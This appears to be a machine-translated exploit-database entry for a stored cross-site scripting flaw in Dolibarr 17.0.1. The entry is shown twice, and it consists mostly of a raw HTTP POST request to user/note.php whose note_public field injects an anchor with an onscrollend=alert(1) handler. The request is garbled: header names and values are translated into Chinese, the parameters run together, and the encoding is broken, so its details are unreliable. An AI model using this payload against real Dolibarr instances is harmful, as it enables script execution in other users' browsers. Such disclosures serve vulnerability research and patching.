#利用标题: Dolibarr版本17.0.1-存储的XSS
#Dork:
#日期: 2023-08-09
#利用作者: Furkan Karaarslan
#类别: WebApps
#供应商homepage: http://127.0.0.0.1/dolibarr-17.0.0.1/htdocs/user/note.php
#版本: 17.0.1(必需)
#在: Windows/Linux上测试
#CVE :
------------------------------------------------------------------------------------------------------------------------
请求
POST /DOLIBARR-17.0.1/htdocs/user/note.php http/1.1
HOST: 127.0.0.1
内容长度: 599
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://127.0.0.1/dolibarr-17.0.0.1/...D024E82D2298B398B395BFAB9BFAB9B1919191916ID=1
Accept-incoding: Gzip,放气
Accept-Language: Tr-Tr,Tr; Q=0.9,En-US; Q=0.8,en; q=0.7
Cookie: 5C8CCD93504819395BD9EB83ADD76EB=G6SUJC3SSSS8CJ53CVK84QV0JGOL; F758A1CD0925196CD7746824E3DF122B=U04RSMDQGRDPR2KDUO49GL0RMH; DOLSESSID_18109F368BBC82F2433D1D6C639DB71BB97E2BD1=SUD22BSU9SBQQCCC4BGCLOKI2EHT
连接:关闭
token=4B1479AD024E82D298B395BFAB9B1916ACTION=SETNOTE_PALBICTOOKN=4B1479AD024E82D298B395B395BFAB9B9B9B1916ID=1NOT e_public=%3CA+ONSCROLLEND%3DALERT%281%29+样式%3D%22Display%3ablock%3BOVERFLOW%3AAUTO%3Aaauto%3Bborder%3A1PX+DAS HED%3BWIDTH%3A500PX%3Bheight%3A100PX%3B%22%3E%3CBR%3E%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3E%3C BR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBr%3CBR%3CBR%3CBR%3CBR%3E%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CB R%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBr 3E%3CBR%3E%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3E%3CBR%3E %3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3E 3E%3 CBR%3E%3CBR%3E%3CSPAN+ID%3DX%3DETEST%3C%2FSPAN%3E%3C%2FA%3modify=De%C4%C4%9FI%C5%C5%9FTIR
#Dork:
#日期: 2023-08-09
#利用作者: Furkan Karaarslan
#类别: WebApps
#供应商homepage: http://127.0.0.0.1/dolibarr-17.0.0.1/htdocs/user/note.php
#版本: 17.0.1(必需)
#在: Windows/Linux上测试
#CVE :
------------------------------------------------------------------------------------------------------------------------
请求
POST /DOLIBARR-17.0.1/htdocs/user/note.php http/1.1
HOST: 127.0.0.1
内容长度: 599
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://127.0.0.1/dolibarr-17.0.0.1/...D024E82D2298B398B395BFAB9BFAB9B1919191916ID=1
Accept-incoding: Gzip,放气
Accept-Language: Tr-Tr,Tr; Q=0.9,En-US; Q=0.8,en; q=0.7
Cookie: 5C8CCD93504819395BD9EB83ADD76EB=G6SUJC3SSSS8CJ53CVK84QV0JGOL; F758A1CD0925196CD7746824E3DF122B=U04RSMDQGRDPR2KDUO49GL0RMH; DOLSESSID_18109F368BBC82F2433D1D6C639DB71BB97E2BD1=SUD22BSU9SBQQCCC4BGCLOKI2EHT
连接:关闭
token=4B1479AD024E82D298B395BFAB9B1916ACTION=SETNOTE_PALBICTOOKN=4B1479AD024E82D298B395B395BFAB9B9B9B1916ID=1NOT e_public=%3CA+ONSCROLLEND%3DALERT%281%29+样式%3D%22Display%3ablock%3BOVERFLOW%3AAUTO%3Aaauto%3Bborder%3A1PX+DAS HED%3BWIDTH%3A500PX%3Bheight%3A100PX%3B%22%3E%3CBR%3E%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3E%3C BR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBr%3CBR%3CBR%3CBR%3CBR%3E%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CB R%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3CBr 3E%3CBR%3E%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3E%3CBR%3E %3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3CBR%3E%3CBR%3CBR%3E 3E%3 CBR%3E%3CBR%3E%3CSPAN+ID%3DX%3DETEST%3C%2FSPAN%3E%3C%2FA%3modify=De%C4%C4%9FI%C5%C5%9FTIR